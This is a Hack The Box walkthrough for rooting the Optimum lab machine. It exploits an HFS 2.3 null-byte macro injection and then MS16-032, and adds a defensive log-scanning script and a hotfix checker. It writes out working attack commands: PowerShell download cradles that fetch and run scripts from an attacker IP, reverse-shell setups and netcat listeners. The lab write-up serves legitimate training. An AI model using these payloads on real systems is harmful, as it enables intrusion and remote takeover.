
This Hack The Box Optimum walkthrough covers rooting the Optimum box offered by Hack The Box. I won’t be using Metasploit! I recently rooted Jerry, another box, as well.

Initial Enumeration

Running nmap and AutoRecon discovers a single open port: a web service running on HTTP, TCP 80. What is more interesting is that the service is Rejetto HttpFileServer (HFS) version 2.3.

HFS 2.3 Vulnerability

The HFS application does not handle the null byte (%00) properly, and this allows remote code execution. Attackers can place a macro after the null byte sequence and have it executed on the server. The null byte terminates the regular-expression match performed by the application’s implementation language but not the string itself, so the remainder is still processed as a macro.

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287

The CVE entry gives an example of abusing this vulnerability.

http://localhost:80/?search=%00{.exec|cmd.}

So the question is then what to send the HFS server in order to get a reverse shell connection?
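Before moving on to exploitation, here is the defender’s side of the same bug: a check that flags HFS search requests where a macro marker follows a null byte. This is an added example, not code from the original post or from Rejetto; the access-log lines it scans are constructed, and the common-log-format layout and the “high/suspicious” verdict names are my own assumptions.

```python
"""Flag HFS 2.3 requests that smuggle a {.exec.} macro past a null byte.

Added example (not from the original post or from Rejetto). The log lines
below are constructed in common log format; only the request target is used.
"""
import re
from urllib.parse import unquote

# HFS macros open with "{." followed by the macro name, e.g. {.exec|cmd.}
MACRO_RE = re.compile(r"\{\.\s*(?P<name>[A-Za-z_]+)")

# Client IP at the start of the line, request target inside the quoted request line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"'
)

# Constructed sample log: one benign search, the CVE example payload, the same
# payload fully URL-encoded, and a null byte in a path with no macro behind it.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Nov/2019:14:58:01 +0000] "GET /?search=report HTTP/1.1" 200 512
10.0.0.9 - - [23/Nov/2019:14:59:47 +0000] "GET /?search=%00{.exec|cmd.} HTTP/1.1" 200 88
10.0.0.9 - - [23/Nov/2019:15:10:09 +0000] "GET /?search=%00%7B.exec%7Ccmd.%7D HTTP/1.1" 200 88
10.0.0.7 - - [23/Nov/2019:15:11:00 +0000] "GET /files/%00notes.txt HTTP/1.1" 404 0
"""


def analyze_request(target):
    """Classify one request target (path plus query string).

    Decodes percent-escapes once so %00 becomes NUL and %7B becomes "{", then
    looks for macro markers in the part of the string that follows the NUL,
    which is exactly the part the vulnerable regex stops looking at.
    """
    decoded = unquote(target)
    has_null = "\x00" in decoded
    tail = decoded.split("\x00", 1)[1] if has_null else decoded
    macros = MACRO_RE.findall(tail)
    if has_null and "exec" in macros:
        verdict = "high"          # null byte followed by an exec macro
    elif has_null or macros:
        verdict = "suspicious"    # one indicator but not the full pattern
    else:
        verdict = None
    return {"null_byte": has_null, "macros": macros, "verdict": verdict}


def scan_log(text):
    """Return the flagged requests from a block of access-log lines."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        result = analyze_request(match.group("target"))
        if result["verdict"]:
            hits.append({"ip": match.group("ip"),
                         "target": match.group("target"), **result})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["verdict"], hit["ip"], hit["target"], hit["macros"])
```

Running it over the sample prints two "high" hits for the 10.0.0.9 requests and one "suspicious" hit for the bare null byte in a path. Decoding only once is deliberate: a second decode pass would turn a literal "%2500" into a NUL that the server never saw.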

How to Exploit HFS Server 2.3

Using Burp Suite

You will need to download Empire and Nishang locally and then modify nishang’s Invoke-PowerShellTcp.ps1 to add a command at the end of the file.

Invoke-PowerShellTcp -Reverse -IPAddress {kali ip addr} -Port 4444

Now it is ready to be called into memory on the target.

{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17:80/Invoke-PowerShellTcp.ps1')}

Don’t forget to URL encode the request with Ctrl+U before sending it on so we can get a shell back.

Send it from the Intercept tab to the Repeater tab using Ctrl+R and put the new set of commands in brackets.

We need to start a netcat listener to receive a shell connection back to the port given in the Invoke-PowerShellTcp.ps1 script.

nc -nlvp 4444

Start a Python web server to host the PowerShell file and send the request in Burp.

python -m SimpleHTTPServer 8000

Exploit without Metasploit

Start by getting the exploit from ExploitDB. The first step to using this exploit is to copy the netcat binary from the /usr/share/windows-binaries directory into the folder where we will be hosting the exploit script. The script will grab the netcat file from the SimpleHTTPServer and send a shell back to Kali.

nc -nvlp 1234
python -m SimpleHTTPServer 80
python 39161.py 10.10.10.8 80

There is the first shell, and it came back with a normal user account. That means it is necessary to escalate privileges by following the routine of more enumeration and more exploitation.

Privilege Escalation

Try using Windows Exploit Suggester or Sherlock.

Windows Exploit Suggester

To use Windows Exploit Suggester, first run systeminfo in the Windows shell and capture its output.

first step in privilege escalation is get systeminfo

Copy the output of this command into a text file named sysinfo.txt and proceed.

# clone the repo
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

# update the local db 
python windows-exploit-suggester.py --update

Now use it to identify vulnerabilities. The --update command downloads the Microsoft security bulletin database locally.

C:\lowuser> python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2019-11-22-mssb.xls
MS16-032 is the vulnerability to exploit for privilege escalation
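What Windows Exploit Suggester does at its core is compare the hotfixes listed in systeminfo against the KBs each bulletin ships. The following is an added example, not part of the original post and not the tool’s own code: a parser for systeminfo output plus that comparison. The systeminfo text is constructed, and the bulletin-to-KB table is my assumption (KB3139914 is the Secondary Logon update I understand to correspond to MS16-032; check it against the downloaded bulletin database before relying on it).

```python
"""Parse `systeminfo` output and report bulletins whose KBs are not installed.

Added example, not from the original post or from Windows Exploit Suggester.
SAMPLE_SYSTEMINFO is constructed; REQUIRED_KBS is an assumption to verify
against the real bulletin database.
"""
import re

SAMPLE_SYSTEMINFO = """\
Host Name:                 CONSTRUCTED-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2920189
                           [03]: KB3012702
"""

# Bulletin -> set of KBs that close it (assumed mapping, verify before use).
REQUIRED_KBS = {
    "MS16-032": {"KB3139914"},
}

# Hotfix entries look like "[01]: KB2919355" and are indented under "Hotfix(s):".
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def parse_systeminfo(text):
    """Return a dict of the top-level fields plus a set of installed KBs."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        kb = KB_RE.search(line)
        if kb:
            info["hotfixes"].add(kb.group(1).upper())
            continue
        # Continuation lines are indented; field lines start at column 0.
        if not line or line[0].isspace():
            continue
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
    return info


def missing_bulletins(info, required=REQUIRED_KBS):
    """Bulletins for which none of the listed KBs is installed."""
    installed = info["hotfixes"]
    return sorted(name for name, kbs in required.items() if not kbs & installed)


def is_64bit(info):
    """True when systeminfo reports an x64 system (relevant to the sysnative
    PowerShell path used later in this walkthrough)."""
    return "x64" in info.get("System Type", "")


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed["OS Name"], "| 64-bit:", is_64bit(parsed))
    print("installed KBs:", sorted(parsed["hotfixes"]))
    print("missing bulletins:", missing_bulletins(parsed))
```

On the constructed input this reports MS16-032 as missing because KB3139914 is not in the hotfix list. Feeding it a saved sysinfo.txt in place of SAMPLE_SYSTEMINFO works the same way, since the parser keys only on the "Field:   value" layout and the indented "[nn]: KB" lines.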

Exploit MS16-032

This second exploit has two parts. First, add this to the end of the Invoke-MS16032.ps1 file found in the Empire module source directory. If you don’t have Empire installed, go ahead and do so.

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.17:8000/newshell.ps1')"

Next, add this to the end of Invoke-PowerShellTcp.ps1 from nishang’s shells and rename it newshell.ps1 so there won’t be any parsing errors from PowerShell when we call it.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 4444

Now, from the open shell where I am the optimum user, I run the following command to attempt privilege escalation.

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17:8000/ms16032.ps1')

Running the command above will unfortunately return an error about not being able to grab a handle.

htb optimum - exploit works for privilege escalation

The fix is to call the 64-bit version of the PowerShell binary through the sysnative path and continue.

C:\windows\sysnative\windowspowershell\v1.0\powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17:8000/ms16032.ps1')
hack the box Optimum root flag found

Checking the SimpleHTTPServer log, you can see where the exploit script retrieved the Invoke-MS16032.ps1 file (served as ms16032.ps1), which then chained a new request for the remote Invoke-PowerShellTcp.ps1 file (served as newshell.ps1), the file that sent the actual connection back to Kali.

root@kali:~/Empire/data/module_source/privesc# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.8 - - [23/Nov/2019 14:59:47] "GET /ms16032.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [23/Nov/2019 15:10:09] "GET /ms16032.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [23/Nov/2019 15:10:24] "GET /newshell.ps1 HTTP/1.1" 200 -

That’s it for the Hack The Box Optimum walkthrough!
